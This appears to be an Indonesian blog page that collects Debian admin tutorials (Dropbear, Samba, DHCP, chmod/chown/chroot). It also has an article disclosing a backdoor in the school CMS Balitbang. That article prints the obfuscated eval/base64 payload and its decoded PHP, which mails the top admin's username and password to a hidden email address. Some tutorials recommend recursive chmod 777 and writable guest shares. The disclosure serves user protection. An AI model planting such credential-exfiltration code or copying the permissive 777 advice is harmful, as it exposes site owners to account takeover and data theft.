Tutorial Install Dropbear di Debian

Install Dropbear

Untuk menginstall Dropbear pada OS Debian anda, silahkan ketikan command ini :

apt-get install dropbear

Tambahkan port dengan mengedit /etc/default/dropbear, caranya tulis di console

vim /etc/default/dropbear

edit kode berikut ini :

NO_START=1
DROPBEAR_PORT=22
DROPBEAR_EXTRA_ARGS=

menjadi seperti di bawah ini :

NO_START=0
DROPBEAR_PORT=443
DROPBEAR_EXTRA_ARGS="-p 109 -p 143"

Langkah 3 : Restart Drobear

Supaya perubahan yang ktia buat berfungsi, anda harus merestart Dropbear dengan command :

service dropbear restart

Optional :

Bagi anda yang berjualan SSH, harus menambahkan /bin/false agar user yang anda buat terbatas hanya akses SSH tanpa bisa login ke console. Tulis command ini :

echo "/bin/false" >> /etc/shells

Setelah selesai, Anda bisa coba login dengan bitvise. Semoga bermanfaat…

Read More

Installasi Samba Server di Debian

Dengan adanya sharing. Maka server anda bisa digunakan sebagai sarana untuk berbagi data ke pada client. Dengan adanya fasilitas ini. Maka client tidak akan susah untuk meminta data dari komputer lain. Untuk hal sharing dalam linux server. Anda bisa menggunakan samba sebagai servernya.
Dengan samba anda bisa mensharing direktori maupun printer yang ada. Namun saat ini saya akan menunjukkan cara untuk mensharing direktori saja.
Langkah installasinya adalah seperti berikut.

1. Masukkan DVD Installasi anda. Untuk menginstall samba

# apt-get install samba samba-client

2. Maka anda akan mendapatkan pesan konfirmasi. Tekan saja enter untuk melanjutkan.
3. Selanjutnya akan terdapat pesan seperti gambar berikut.

Pilih saja no jika IP server anda tidak didapatkan dari DHCP server.

1. Maka installasi akan berlajut sampai selesai.

Setelah selesai maka tahap selanjutnya adalah konfigurasi.

1. Pertama masuk ke dalam direktori samba yang berada di direktori etc
   

   # cd /etc/samba

2. Lalu edit file smb.conf

# vim smb.conf

3. Lalu carilah baris

sharing = user

Ganti user dengan share dan hilangkan tanda pagar di depannya.
4. Setelah itu cari

[homes]

Tambahkan konfigurasi berikut di atasnya.

[NAMADIREKTORI] comment = Sharing NAMADIREKTORI browseable = yes writeable = yes guestok = yes path = /path/ke/direktori

ganti NAMADIREKTORI dengan nama direktori yang akan anda sharing. Lalu ganti /path/ke/direktori dengan path direktori semisal /home/Galih/
5. Ulangi langkah di atas jika anda ingin menambahkan sharing yang lainnya.
6. Setelah itu save dan restart samba

# /etc/init.d/samba restart

7. Maka anda bisa mengakses direktori yang telah disharing tersebut di komputer client.
8. Namun jika direktori tersebut ingin diubah isinya oleh sang client. Pastikan direktori yang akan diakses oleh ftp client telah diberikan atribut 0777 dengan perintah

# chmod 777 NAMADIREKTORI

Read More

KONFIGURASI DHCP SERVER DEBIAN 7 WHEEZY

Dynamic Host Configuration Protocol, digunakan untuk melayani request ip address dari client. dengan ini kita tidak perlu lagi mengkonfigurasi ip di sisi client secara manual, client akan meminta ip Address dari server ,kemudian server akan memberikan sesuai dengan pool yang di sediakan.

a. Pemasangan

Aplikasi DHCP Server yang kita gunakan bernama dhcp3-server, pada Debian 7 Wheezy paket aplikasi dhcp3-server tersedia di DVD 2, jika sebelumnya DVD-Drive anda dalam keadaan kosong, silahkan masukkan DVD 2 Debian Wheezy, jika berisi DVD 1 silahkan eject dengan perintah

root@wheezy:/home/poss# eject

lalu masukkan DVD 2, lanjut dengan perintah untuk menginstall paket dhcp3-server

root@wheezy:/home/poss# apt-get install dhcp3-server

Reading package lists… Done

Building dependency tree

Reading state information… Done

Note, selecting ‘isc-dhcp-server’ instead of ‘dhcp3-server’

Suggested packages:

 isc-dhcp-server-ldap

The following NEW packages will be installed:

 isc-dhcp-server

0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.

Need to get 0 B/936 kB of archives.

After this operation, 2.225 kB of additional disk space will be used.

Prakonfigurasi paket …

Selecting previously unselected package isc-dhcp-server.

(Sedang membaca basis data …  24697 berkas atau direktori telah terpasang.)

Sedang membuka paket isc-dhcp-server (dari …/isc-dhcp-server_4.2.2.dfsg.1-5+deb70u6_i386.deb) …

Sedang memproses pemicu untuk man-db …

Sedang menata isc-dhcp-server (4.2.2.dfsg.1-5+deb70u6) …

Generating /etc/default/isc-dhcp-server…

[FAIL] Starting ISC DHCP server: dhcpd[....] check syslog for diagnostics. … failed!

failed!

invoke-rc.d: initscript isc-dhcp-server, action “start” failed.

Terlihat hasil keluaran berwarna merah “ Failed! ”, itu hal normal karena dhcp3-server kita belum di konfigurasi untuk alokasi Poll Addressnya, jika konfigurasi benar maka pesan Failed! akan hilang.

b. Konfigurasi

masukkan perintah di terminal

root@wheezy:/home/poss# nano /etc/dhcp/dhcpd.conf

Beri tanda “#” pada semua baris . kecuali baris script dibawah ini. sesuaikan ip dengan topologi jaringan yang telah di buat.

# A slightly different configuration for an internal subnet.

subnet 192.168.7.0 netmask 255.255.255.0 {

range 192.168.7.100 192.168.7.200;

 option domain-name-servers poss.edu;

 option domain-name “poss.edu“;

 option routers 192.168.7.254;

 option broadcast-address 192.168.7.255;

 default-lease-time 600;

 max-lease-time 7200;

}

#..

Jika dalam debian server anda terdapat lebih dari 1 Eternet. Maka kita harus memasukkan Eternet mana yang akan digunakan oleh layanan DHCP Server. Edit file default dhcp dengan perintah:

root@wheezy:/home/poss# nano /etc/default/isc-dhcp-server

#..

# On what interfaces should the DHCP server (dhcpd) serve DHCP requests?

#Separate multiple interfaces with spaces, e.g. “eth0 eth1″.

INTERFACES=”eth0”       #sesuaikan dengan eth yang akan menerima layanan DHCP

#..

root@wheezy:/home/poss# /etc/init.d/isc-dhcp-server restart

[FAIL] Stopping ISC DHCP server: dhcpd failed!

[ ok ] Starting ISC DHCP server: dhcpd.

Tanda “ok” menandakan setingan dhcp server yang kita masukkan telah benar, dan DHCP Server berjalan dengan baik.

c. Pengujian

1. Pengujian pada Linux

Untuk Client yang menggunakan sistem operasi Linux, maka apabila DHCP tidak terdeteksi oleh Network Manager maka perlu di masukkan perintah secara manual melalui Terminal, dengan perintah:

root@wheezy:/home/poss# dhclient eth0

Perintah ini bersifat sementara dan akan hilang ketika Komputer di matikan ( restart ), agar konfigurasi dhcp tidak hilang ketika komputer di restart maka kita harus mengedit file interface dengan perintah:

root@wheezy:/home/poss# nano /etc/network/interfaces

#..

auto eth0

iface eth0 inet dhcp

#..

root@wheezy:/home/poss# /etc/init.d/networking restart

Sekian dari saya , untuk pengaturan di windows tinggal tukar di adapter seting menjadi assign ip addresss automaticaly

Read More

Tutorial CHMOD Pada Linux dan Pengertian nya (Change Mode)

Pernah mendengar kata CHMOD? Saya juga baru tau apa ituCHMOD. Bagi pengguna sistem operasi Linux dan seorangweb developper, mungkin kata tersebut sudah tidak asing lagi. CHMOD adalah kepanjangan dari Change Mode, sebuah perintah untuk memberi hak akses/permisions kepada pemilik, user biasa, dan non user (ini pengertian versi saya :)  ).CHMOD inilah yang menjaga keamanan dari suatu data, jika ada user nakal yang berusaha untuk mengakses, mengubah, bahkan membaca data yang bukan haknya.

Ok, Langsung aja . .. Hak akses suatu data, disimbolkan dengan angka.

• 0 = Tidak ada hak akses
• 1 = Hak akses untuk masuk dan mengeksekusi suatu data atau folder (direktori)
• 2 = Hak akses untuk menulis/mengubah suatu data atau folder (direktori)
• 4 = Hak akses untuk membaca suatu data atau folder (direktori)

Jadi jika semuanya dijumlahkan menjadi 7, yang berarti suatu user mempunyai hak penuh akan data atau folder (direktori) tersebut. Suatu data dapat diakses oleh 3 user, yaitu root (pemilik data), user group, dan user non-group. Berikut contohnya :

Contoh CHMOD : 
Chmod 753, berarti :

• 7 = 4+2+1 : root (pemilik file) mempunyai hak untuk mengeksekusi (1), menulis (2), dan membaca (4) suatu data atau direktori
• 5 = 4+1 : user group mempunyai hak untuk membaca (4) dan mengeksekusi (1) suatu data atau direktori
• 3 = 2+1 : user non group mempunyai hak untuk menulis (2) dan mengeksekusi suatu data atau direktori

Contoh Penggunaan CHMOD

Jika ingin mengubah hak akses dari suatu data atau direkori, dari hak akses 644 (setting default dari pihak hosting) menjadi 755 (agar dapat dibaca) berikut caranya :

chmod 755 [file_name]

chmod 755 index.php          (untuk file)

chmod 755 /web/images    (untuk folder/direktori)

Kalau ingin mengubah hak akses suatu folder yang di dalamnya ada banyak folder dan file, bisa menggunakan perintah berikut :

find [direktori] -type f -exec chmod 777 {} \;     (untuk file)

find [direktori] -type d -exec chmod 777 {} \;    (untuk folder / direktori)

CONTOH :

find /home/gathel/htdocs-linux -type f -exec chmod 777 {} \;     (untuk file)

find /home/gathel/htdocs-linux -type d -exec chmod 777 {} \;    (untuk folder / direktori)

1) CHOWN (Change Ownership)
CHOWN merupakan sebuah perintah yang digunakan untuk mengganti pemilik dari sebuah file, perintah CHOWN ini hanya dapat digunakan oleh root / super user.

A) Perintahnya :
# chown namauser.namagrup namafile

B) Contoh:
# ls -l /home/gery/data
total 4
-rw-r--r-- 1 gery gery 15 Oct 01:46 coba.txt
Perintah diatas menghasilkan informasi dari file data yang berada di direktori /home/gery dimana pemiliknya adalah user gery. Untuk merubah kepemilikannya gunakan perintah :
# chown saya /home/gery/data
Jika kita ingin melihat perubahannya gunakan perintah :
# ls -l /home/gery/data
-rw-r--r-- 1 saya gery 15 Oct 01:46 coba.txt

C) Macam-macam perintah CHOWN
# chown root /var/run/httpd.pid
Mengubah kepemilikan /var/run/httpd.pid ke root (standart nama untuk superuser)
# chown rob:developers strace.log
Mengubah kepemilikan dari strace.log ke rob dan group diidentifikasikan ke pengembangan
# chown nobody:nogroup /tmp /var/tmp
• Mengubah kepemilikan /tmp and /var/ ke bukan siapapun
• Mengubah group /tmp and /var/tmp ke bukan group
# chown :512 /home
Mengubah group yang diidentifikasi di /home ke 512 (dengan mengabaikan apakah nama group berasosiasi dengan identifier 512 atau tidak)
# chown -R us base
Mengubah kepemilikan base ke user us dan membuat ini berulan.


2) CHMOD (Change Mode)
Chmod merupakan sebuah perintah yang digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori, dapat juga menggunakan sistem numeric coding atau sistem letter coding.

Ada tiga jenis permisi atau perijinan yang dapat dirubah :
-r untuk read.
-w untuk write.
-x untuk execute.

Berikut adalah keterangan numeric dari sebuah permision file :
0 = tidak ada operasi diijinkan.
1 = permisi untuk melakukan cd (pindah direktori) ke satu direktori.
2 = permisi untuk menulis.
4 = permisi untuk membaca.

Berikut angka-aangka dari file permissions :
0 = --- 4 = r—
1 = --x 5 = r-x
2 = -w- 6 = rw-
3 = -wx 7 = rwx

Dengan menggunakan “letter coding”, kita dapat merubah permission untuk masing-masing u (user), g (group), o (other) dan a (all) dengan hanya memberi tanda plus (+) untuk menambah ijin dan tanda minus (-) untuk mencabut ijin. Dengan menggunakan sitem “numeric coding”, permission untuk user, group dan other ditentukan dengan menggunakan kombinasi angka-angka 4, 2 dan 1 dimana 4 (read), 2 (write) dan 1 (execute).
Untuk menggunakan perintah chmod, perintahnya adalah:
# chmod hakakses namafile
misalnya: # chmod 644 coba.txt
Perintah tersebut akan mengubah hak akses file coba.txt menjadi seperti berikut:
-rw-r--r-- 1 postgres postgres 41527 Oct 28 2010 coba.txt
Untuk mengganti hak akses sebuah direktori beserta dengan isinya, gunakan parameter R, dengan parameter tersebut, chmod akan dijalankan secara rekursif, misalnya seluruh file yang ada pada direktori /home/user/public_html akan dirubah hak aksesnya menjadi 755
maka perintahnya adalah sebagai berikut: # chmod R 755 /home/user/public_html


3) CHROOT (Change Root)
Chroot merupakan metode root direktori (/) virtual yang akan menjadikan home direktori dari suatu user seperti root (/) di sistemnya sendiri sehingga mencegah user tersebut dapat naik ke level direktori yang lebih tinggi dan mengambil informasi dari sistem tersebut.
Dengan chroot kita dapat membatasi ruang lingkup (direktori) user/daemon atau di penjarakan, ini dilakukan untuk memperkuat keamanan sistem. Jika suatu user/daemon yang di chroot maka dia tidak akan bisa keluar dari direktori (home directory) yang telah di tetapkan, hal ini sangat bermanfaat misal user/daemon yang di jaili (chroot) telah diambil alih oleh penyusup maka dia tidak akan bisa keluar dari direktory tersebut dan akan mengurangi resiko pencurian data, tidak akan menggangu user lain atau kinerja sistem secara keseluruhan tapi hanya sebagian saja. Oleh karena itu untuk melakukan chroot harus menetukan environment dan permission yang tepat untuk user/daemon yang akan di jail.
Contoh penerapan chroot :
Membuat user, group dan direktori untuk chroot BIND
Setelah instalasi selesai tanpa error berikutnya membuat group dan user named untuk menjalankan bind (daemon).
# groupadd named
# useradd -g named -g /chroot/named -s /bin/true named

kemudian kunci user named
# passwd -l named

membuat direktori untuk memenjarakan user named
# mkdir -p /chroot/named
opsi -p digunakan agar sekaligus membuat parent direktorinya(/chroot), kemudian masuk ke direktori yang baru dibuat
membuat direktori yang diperlukan dibawah direktori /chroot/named
# cd /chroot/named
# mkdir dev
# mkdir etc
# mkdir -p var/run
# mkdir conf/secondaries

Jadi pada intinya, penerapan chroot harus didahului membuat user, group dan direktori baru.

Read More

AWAS Hati - Hati !!! Menggunakan CMS Balitbang Kemdiknas RI

sekarang ini pengguna CMS dari Balitbang sudah mencapai 111.000, bayangkan saja hampir banyak sekolah di Indonesia membangun website sekolahnya dengan CMS dari Balitbang, termasuk saya sendiri pernah menggunakannya untuk membangun website sekolah. Memang kita harus bangga dengan buah karya anak bangsa dengan adanya CMS Balitbang kita bisa membangun website sekolah dengan mudah dan Instan, tapi dibalik kemudahan itu semua ada kekurangan dari penggunaan CMS Balitbang tersebut selain dari bug - bug yang banyak sekarang ini ada rumor baru mengenai back dor yang dibuat oleh sang programernya, untuk lebih jelasnya anda bisa menyimak artikel dibawah ini.

Kali ini kami ingin membongkar skandal perogramer CMS Balitbang yang di gunakan oleh banyak lembaga pendidikan SD,SMP dan SMA/K,  Sebuah sistem Model Website Sekolah yg di rancang oleh kajianwebsite.org dengan Balitbang Kemdiknas RI , hingga saat ini yang menggunakan sistem tsb berkisar 100 ribu lebih lembaga pendidikan baik SD,SMP dan SMA/K.

Awal cerita rekan kami sebut saja "Mawar" dari salah satu lembaga pendidikan ingin meningkatkan IT di lembaganya salah satunya membangun sebuah website resmi. Dari informasi yg kami dapat Mawar di tawari untuk menggunakan sistem CMS Balitbang tsb karena pemakainya sudah sangat banyak dan ada pelatihanya oleh petinggi di lembaga tsb. Mawarpun kemudian konsultasi dengan kami bagus atau tidak sistem tsb di gunakan.

Kamipun mulai menacari tahu tentang sistem CMS Balitbang tsb dari berbagai sumber dan di dapat banyak sekali penggunaya di seluruh Indonesia dan kamipun melihat ada pelatihanya juga kami berpikir wajarlah itu sistem yg bangun sekelas Kementrian, dengan keyakinan hal tsb kamipun mulai mencari dimana bisa mendapatkan CMS Balitbang tsb akhirnya ketemu dan kami download versi terbarunya "CMS Balitbang 3.5.2".

Kami mulai membentuk tim di medan terdiri dari 5 anggota, kita semua sepakat akan melakukan analisa 1 hari dengan sistem tsb. Hari berikutnya pun tiba, semua anggota sudah siap menyapaikan hasilnya.
1. Di temukan sebuah bug upload yg sangat berbahaya di versi sebelumnya versi 3.4
2. Ini yg kami tidak habis pikir, terdapat celah yg sengaja di buat oleh sang programer di semua versi termasuk versi CMS Balitbang 3.5.2.

Pembahasan:
1. Masalah bug itu wajar namanya sistem tidak ada yg sempurna dan walau sempat menjadi target oleh kawan2 yg jahil untuk melakukan hacking di sistem tsb "anda bisa cek di google banyak sekali tutor hack sistem tsb" tapi masalah bug ini selesai setelah di rilis versi terbarunya.

2. Hal yg paling kami sorot adalah hal yg ke dua ini tentang penanaman backdor/celah oleh sang programer, sebenarnya kami sering menumukan hal seperti ini di banyak CMS yg pernah kami teliti, tapi yg membuat kami mengelus dada adalah ini sistem yg di rancang bersama Kemdiknas RI.

Hal Teknik :
Jadi inti nya di sistem tsb telah di taruh sebuah file yg di rancang untuk mengirim User dan Password dari admin yg memakai sistem tsb ke salah satu email.

Kami sebut saja filenya bernama "admin2.php" di letakan di folder "functions"
Kode yg terdapat dalam file tsb sebagai berikut:

//?php <br />eval(gzinflate(base64_decode(base64_decode("RFpSSHpxTllBSVN2MHBwVnQxZ1FIbEdqWHBEQkpKTU5teEg0RVEwbXg5UFBmNEdTcXVxcitsWHNXZmU3dXB0djJXVnI4VHZQbG9JbS80UEZlNERGNzM5ZXFXZk85RUlvK2d2MTE4aHpXS3ZYcEhoeW1yWldQSjFSRUV2akpsY01aT2ZRL2FBV0xHTTNBY3o4azByQWFBQU9uV05raXFnT3pRQU5oaHlkWHgzK1BPTXVRL3NNTFo3NU5qSG9qbzdSU1FlODFMSDRxT0dpNzFDT2N3U2E2VXJTR2o3ZFVqNlhzNDdRZ1BMRklER0k1bmpxbEdxaTVhZkIrWTFDTFdja3NuNTcrdHJzNGpmNTBmSzRNL0hzaWxYVTEycW8wcmxvNFdJNVcvQUxFcVIwK2krM1B5MHRLSEMvbnRTNXVKZ3VEMmVEMXo0UjViOTdaU3NYVTJkWlVxWlR4UHpJOVBnRkErRHEwbjdsWmN4d0laTHhjMUQ2TmtvZ2hyUnc5bE01eVZSQko5SWNobytSUjRIRVVMeGNHRU5WcHI0SXovMFIxY2JzN3RHRmNaNjk2aFdLTzBaangzRWpnTDYydnlkVW8xWjFuWE5udHpnZ1JvUFBNbTVwbENseHZmZlo4b3phY1JDOEgxRmZ0RmJ4amh1VFlRMGdDdjZ6dllPSm1pOVAvM3JEdGdycWF0NHpPbmhQNUZJWlJubUZrL213aVAzd1dRL3l5NWhXYXRaNTFyYXQyWU4yQnFFSjlRK3h0Z2ZlNjJpSWlhVlliTHU3Uys0NTc5L3FTclJrMWw2N21ZVVpaZnZ4WGR3VzlzNUwzNjllV1YwMThKc0NhdW9Xb0kranIrVnBzV2JwRFU3VmMvUHhaWTVCR3VQdWlVYjVqV1BXai9CbWQ0KzJydSt2cVVsTnIvQmVtVG9FR1RGVTBSKzZoemRyRXIrUFVZL3FFbmx6V3l1TXVWY3J2TmlGL0VPTzR1ODlSUXdYTlZXK0JBWmttVUEveHNVTm85QWE1UHRLK05hNTB3QkhrVG9mN1NkUmt0VnNZWWRLdkdOVzcxT3V1VWxFRkFUSzZLTVhFR3I5bU80ZjROYWhSUVBmZW94cElHK1lQQ0xjeHpRcjdSbzNCOGQzQnRHSEx3aFVpelg0N25NdTBpSThzVlRJZ0ZQek01TUpZVEhOaE0wTXZNQmxTd3BtRmVuZ001cUx3OTc3VmFFWG5hVnpFN3NmanlYR3NFRkNXRXhDSVpNNGluUVcyOUJjYTZjK3lKZ2ZQdTdUa0VsVENkbXh3cDFCWDRrSHFEZGNqWGFGbnJ1cy9Na1V3enJNZ0laQXRHckJSSTNQZTFoV09YS3ppdklnRUxiaG1jQVdoNFZsRjA0TzlLNTNKbG41NllWL1VXM3Q3bm5WYzNQb3VpUVp0cmtINUo0QmhoZFRQdmRVOWxTTDRGVStJQXpTNVdNckdiQU03ZU5XY1c0ekNHS1FaR1V4UHZ4S283UkkzUXZZWEhEUUV5OERJQTR2S2pxNzczWFVZZTBIYkRIbWRydGszeGJGTE9yWkJlS1JMQkRLV0FQZ0o3c0xQNTcxOHo2MDdmZ0FqZEI5YVhsN0h1MkVQYnhodHhnWDZsZGEyeHlVWUtadEVFZFJUNW9XWTkvc0pVOFpTZHB0UFBKSUZXMUYxUmFrMTJnK1hUSnZKWk9HMWJpQ2d5cGR2VnVvVkkybW9lSXQ2b3A1bmNPSHJWQS9zMmVFbjhYWU44dTVFcmVHUDdCMTdCM3Q4Mk5JSXBEaGxWSkVBaXNDcTBzYm1CNFIySEliTStFSVVhT1Z4eVVSN2U5MFlJKzUvcExtNTBWdmt0U25MazNvSFE5bHFBaVdTRGtadGZicTZWQm91WXhuVEFudklCanRKR3hXaGJQYmgySWdZZ2dJbjh6Zm90U1VDYXFjQzNDMWZtTHE4Tm1rOUlzNkVKdS84WVZHWTcrYlpBR2JGMDhmMDdZc0lMTEpEVVVrTjcyUXV6eldGOGFvcFdaK3hEdEs0dG5VVnU1cVorNlE4NS9EQ3dqdkRLWE10czhMbzlmWWRCYXhCRDY1dk5IY3VSTVd6Q2RjdW9ocWpTNVJpQ0dxUFdhT05hUU5KaTRzek5OeUhOMDV4SUxYaEFnbVpSeEVRSUYyUXp3NVU5SWU5dEVmUDV3QTEwR3I3Uk1BUHczZG1YYmJ6WnBDbVgxc2pubHlJdDRvV1VmK3VKT2haYXF1K2VVU2F0OXRrbEZmQm9FMFRNRU9uK2M4eUNKcWJRMytiaUluVGNqYmhGTWdkekI1Y09wWGtsN2YwMU9McWtRaFZPQ0I3UGNaamFDZ3dwNURLWTNqWUxIdkJEcmZQeVBuajc5Ly8vbno1OCsvdi80SA=="))));<br /> //

Terlhiat sangat jelas sang programer sengaja merahasiakan isi kode script yg asli dengan meng'enkripsi seperti yg terlihat di atas. Kamipun berusaha cari tahu apa yg ada di balik kode tsb dengen mencoba mendecrypt code tsb tapi kok masih ter'encrypt ....... ?? ternyata sang programer sengaja membuat encrypt tsb samapi 7 kali perulangan itu mungkin di lakukan untuk mengecoh bila ada yg ingin mendecrypt

Hasil Decrypt:

=======
include "koneksi.php";
include "fungsi_pass.php";
data = "";
$query="select userid, count(menu) as jum from user_level group by userid order by jum desc "; $alan=mysql_query($query) or die ("query gagal");
if($row=mysql_fetch_array($alan)){
    $query2="select * from user where userid='$row[userid]' ";
    $alan2=mysql_query($query2) or die ("query gagal");
    $r=mysql_fetch_array($alan2);
    $data .="top admin : $r[username] ----- Password : ".unhex($r[password],82)."";
}
$data .= "";
$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);
$headers = "From: \"Komunitas $nmsekolah\" <$webmail>\r\n";
$headers .= "Content-type: text/html\r\n";
mail($email, "Komunitas $nmsekolah :: Pesan baru ::", $data, $headers);
echo "Pesan terkirim";
========

Nah itulah kode yg asli dari situ kami bisa jelasakan bahwa inti barisan kode tsb
1. Mencari data user dan password yg mempunya hak akses penuh dalam sistem tsb
2. Melakukan peracangan format email yg di sertai dari data user dan password yg di dapat tadi.
3. Menetukan email yg akan di tuju di sini email pun di ecrypt lagi perhatikan baris kode
- "$email = unhex("64gbfc1b580c1c1bab3cb92848abfc4c0b3beb3",82);" di encrypt menggunnkana fungsi "unhex" fungsi "unhex" itu pun di buat sendiri oleh programer. Setelah kami berusaha mendercypt di hasilkan sebuah alamat email "alanrm82@yahoo.com" itulah email tujuan nya.
4. Melakukan perintah pengiriman format email yg tadi telah di rancang dengan beserta ada user dan password sistem tsb ke email "alanrm82@yahoo.com".

++++++++++++++++++++++++++++

Dengan itu sang programer dapat setiap saat masuk ke sistem di lebih dari 100 Ribu lembaga pendidikan yg menggunakan sistem tsb secara tidak sah.

Kami menyarankan bagi pengguna sistem CMS Balitbang yg melihat artikel ini untuk di kroscek ulang tentang sistem yg anda gunakan mengenai privasi dan keamanan data yg ada di Lembaga pendidikan anda.

Masuk peristiwa awal kami pun menyarakan agar Mawar rekan kami untuk tidak menggunakan sistem CMS Balitbang tsb.

Mungkin Pesan kami buat kawan2 Programer janganlah menjatuhkan harga diri anda sendiri denga hal2 konyol seperti kasus yg kami bahas ini.


++++++++++++++++++++++++++++++++++++
Ada Klarivikasi di komentar dari salah satu anggota tim CMS Balitbang kami masukan di sini :
---------------------------------------- 1 ---
Choirul Anam =>

"Saya baru saja mendapatkan link pembicaraan ini dari seorang kenalan. Saya adalah salah satu anggota team yang ikut andil dlam melahirkan CMS ini. Saya akan klarifikasi. Teman2 mohon tidak langsung menjustifikasi negatif tentang pemasangan backdor tersebut. Ini ada latar belakangnya. Pada awal kelahirannya dulu CMS ini tidak hanya dipakai oleh sekolah, tetapi dipakai juga oleh dunia bisnis, bahkan pemasangannya dibisniskan oleh beberapa pengembang website komersial. Kita tidak menginginkan hal ini terjadi. Maka disepakati pemasangan backdor ini. Intinya back dor tersebut dipasang untuk pengamanan intra, artinya jangan sampai CMS ini digunakan untuk dikomersialkan atau untuk webiste dengan isi negatif. Kita tidak punya mahsud apa2. Tidak akan mengambil keuntungan apapun dari pemasangan back dor tersebut. Dan perlu teman2 ketahui, pembuatan CMS ini bertujuan untuk mempermudah sekolah dalam membuat website, bahkan yang ikut pelatihannya akan memperoleh domain dan hosting gratis. Itu yang dapat saya klarifikasi, semoga ada manfaatnya, terima kasih"

Kami membalas =>
Terimakasih bung atas atensinya klarifikasi hal ini, di sinipun kami juga tidak ingin melakukan pemojokan kepada siapapun. Kami mengharap siapaun yng mengembangkan sebuah sistem opensource untuk juga mengutamakan Privasi dari pengguna sistem tsb. Mungkin ada cara lain yg bisa di lakukan selain membuat privasi pengguna terganggu untuk mennaggulangi kasus comersialisasi tsb. Coba kita ambil contoh terburuk bila sistem terjadi masalah data misal manipulasi negatif, apa bukanya pihak yg menanam backdor malah yg menjadi tujuan Fitnah. Sebelumnya terimkasih atas Klarifikasinya bung akan kami akan masukan di note kami ini."

---------------------------------------- 2 ---
Choirul Anam =>
Sebenarnya masalah backdor itu sudah pernah ada yang memunculkan sekitar 3 tahun yang lalu dari Malang. Dan sudah dibicarakan dengan pihak Balitbang, hasilnya Balitbang meminta agar backdornya tetap ada agar bisa dipakai sebagai bahan utk memonitor jumlah pengguna CMS ini. Saya mengikuti pengembangannya sampai versi 3.50, dilakukan pada Desember 2012. Versi sesudahnya saya tidak ikut lagi karena kesibukan di sekolah semakin banyak. Untuk usulnya itu, saya akan coba teruskan ke pihak Balitbang. Terima kasih. Saya off dulu yaaa, mau berangkat ronda.

Nama Disamarkan =>
ngutip perkataan abang developernya, "... hasilnya Balitbang meminta agar backdornya tetap ada agar bisa dipakai sebagai bahan utk memonitor jumlah pengguna CMS ini"

apakah memonitor pengguna cms dengan cara mengirim user + pass admin ke email tertentu? apakah tidak ada cara yang lebih 'terhormat'? saya bersyukur sekali malah, ada cms buatan anak indonesia yang bisa digunakan untuk mempermudah kelancaran proses go onlne sekolah2 di indonesia, tapi saya tidak habis pikir, kenapa bisa hal semacam ini terpikir oleh developer2 handal? ataukah ini memang sengaja di rencanakan / permintaan dari pihak balitbang sendiri? kita sebagai rakyat indonesia yang mendambakan keadilan harus memulai dari hal2 kecil seperti ini, karena kalo hal seperti ini saja tidak bisa diselesaikan, apalagi masalah besar yang lain?
++++++++++++++++++++++++++++++++++++

SEMOGA BERMANFAAT :D

Read More